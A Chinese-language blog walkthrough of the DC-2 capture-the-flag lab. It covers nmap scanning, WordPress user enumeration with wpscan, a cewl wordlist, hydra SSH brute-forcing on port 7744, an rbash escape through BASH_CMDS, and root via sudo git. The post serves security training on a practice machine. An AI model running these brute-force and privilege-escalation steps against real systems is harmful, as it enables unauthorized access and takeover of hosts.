DC-2

DC-2

先扫描当前网段下的ip确定靶机。

1
nmap -sP 192.168.93.0/24

扫描靶机开放的端口

1
nmap -sV 192.168.93.152

发现开放80端口,用浏览器进行访问

发现ip地址被直接转成了dc-2,而且无法访问,页面显示无法解析出ip地址

进入kali下的/etc/hosts,在末尾加上192.168.93.152 dc-2即可。

再次访问页面,可以正常访问。

拿到flag1

image-20210501230235415

这里再次用nmap进行扫描

1
nmap -sS -Pn -A -p 1-65535 192.168.239.152

发现还扫出来一个7744端口,运行了ssh服务。

flag1提示cewl,同时wordpress也是一种框架,可以寻找相关工具。

1
wpscan --url http://dc-2 --enumerate u#扫描关于wordpress的相关漏洞

image-20210502210311471

发现了三个用户。

但并不知道密码,这里查询cewl用法,使用cewl生成密码。

1
cewl -w 555.txt http://dc-2

再将用户写入txt文件,开始准备爆破ssh用户。

1
2
hydra -L 444.txt -P 555.txt ssh://192.168.239.152 -s 7744 -vV指定7744端口ssh爆破用户名和密码。
wpscan --url http://dc-2/ -e u -U 444.txt -P 555.txt #这个也能爆。

登陆tom用户:

1
ssh tom@192.168.239.152 -p 7744

发现是rbash,部分命令受限,绕过rbash

1
2
3
BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
1
2
ls
cat flag3.txt

image-20210502223740131

1
2
3
4
su jerry
cd /home/jerry
ls
cat flag4.txt

根据提示联想git提权

1
2
3
4
5
sudo -l#查看sudo配置文件
sudo git help config#git提权
cd /root
ls
cat final-flag.txt

image-20210502231015330


本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!